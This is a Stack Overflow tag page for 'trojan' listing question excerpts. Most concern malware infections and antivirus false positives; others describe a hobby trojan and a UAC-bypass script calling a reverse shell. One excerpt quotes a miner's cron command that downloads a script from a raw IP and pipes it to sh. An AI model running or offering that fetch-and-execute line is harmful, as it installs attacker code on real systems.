Questions tagged [trojan]

A trojan is a malicious program which is injected to or poses as a known application.

113 questions
1
vote
0 answers

Yarn is impacted with XMrig miner trojan

HDP stack yarn processor infected with XMrig trojan, even If I use the kylo ex2 sandbox, i get this trojan that take 100% of your CPU. yarn) CMD (wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1) This is a cron, run by the yarn…
1
vote
0 answers

Trojan in my VB application

I recently sent my application to a friend and to my surprise, he told me that he was with a Trojan. I checked the file in Virus Total and the site reported these things to me. Does anyone know how to solve it? Does anyone know how to solve it?
Sérgio Wilker
  • 162
  • 1
  • 2
  • 18
1
vote
1 answer

Pyinstaller creates Trojan Virus when converting files

I had a perfectly normal file. I downloaded pyinstaller, created a .exe with it, and wanted to share it. I uploaded it to dropbox, filehopper and one more (cant remember which) each time i tried to share it. Every single time, when i download the…
XaNaX
  • 53
  • 1
  • 9
1
vote
2 answers

Visual Studio 2015 Community - Trojan HEUR/QVM03.0.Malware.Gen

I created a very simple Windows form project in Visual Studio 2015, with only 1 button, that shows 1 message box on click. I compiled it and sent the file the file to a friend, but he scanned it with Virustotal, where the result was this. One AV…
abitguru
  • 55
  • 1
  • 1
  • 4
1
vote
2 answers

Help with potential trojan passed through site

So I'm pretty sure my site's been infected with some kind of trojan or virus that attached itself to the scripting within the site. Every time I try and update my Drupal-based site, I get a white screen with this stupid "i'mhere" message. Upon…
1
vote
2 answers

Trojan(Simple Client-Server in C)

So I started network programming a few days ago, and I created a very simple trojan (Victims execute a client that create a connection to the hackers PC's and then Hackers can execute function of CMD by a simple system() command). Basically my…
1
vote
1 answer

I accidentally created a virus. Just how is this a virus?

So i was doing some experimenting with strings, just to see whether i could store a string in a variable and then display the contents of the variable onto the screen. Apparently, my antivirus wasn't too happy with that. Here is my code: #include…
Traptor
  • 81
  • 3
1
vote
1 answer

Trojan in vim's latex_suite?

I was going through some code for latex_suite called vim_latex (http://vim-latex.sourceforge.net/) and I found few interesting lines in the file called "templates.vim": " Back-Door to trojans !!! function! Compute(what) exe a:what if…
Matt
  • 162
  • 2
  • 11
1
vote
1 answer

Remove vbscript or deactivate vbscript from html source code

I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a…
Mr poppins
  • 53
  • 1
  • 12
1
vote
1 answer

trojan testing within upload ssh/ftp

We had yesterday an trojan upload on our debian lenny server. It cost 6 hours of repairing several sites + local pc's. At 1 of the local pc I discovered that the firewall was set to disabled. The pc was also infected with this…
1
vote
1 answer

Typo3 function generates Trojan JS BlacoleRef.BS every time new

In my typo3temp folder I always find a file called javascript_a1cb3a5978.js. It seems that this is a JS by Typo3 to encrypt email adresses. Now in the code always the trojan is appended. I delete the file from the Typo3 cache and if the page is…
testing
  • 19,681
  • 50
  • 236
  • 417
1
vote
1 answer

Suspected Error div on web pages of YontooInstallID, Y2PluginIds

I have found out that, while Inspect Element on chrome or firebug on mozilla, i found these strange invisble divs.. how can we remove this.. or is some kind of intrusion... below is the code
0
votes
1 answer

Wordpress Trojan issue

I accessed the wordpress website I am making and received a trojan warning I have checked it with various online scanners and it appears to be some inline frame code issue. I didnt even know wordpress could get infected. Please help me, I've tried…
David Garcia
  • 3,056
  • 18
  • 55
  • 90
0
votes
1 answer

android/iphone - Can a background process or service inject code or read variables in a foreground app?

I am getting started on Android & iOS development and hence links to relevant resources will also be appreciated, just that I couldn't find anything much relevant. Case Detail: I have to build an app that holds some critical information in a…
kumar
  • 882
  • 2
  • 11
  • 19
0
votes
0 answers

Flag system to uac bypass

I'm creating a system whose I'm going to have to run the program so that if it doesn't have a flag it will start itself, and it's kind of strange try: flag = sys.argv[1:][0] utils.reverse_shell('msg * flag :) ') except IndexError: …
Midia
  • 1
  • 2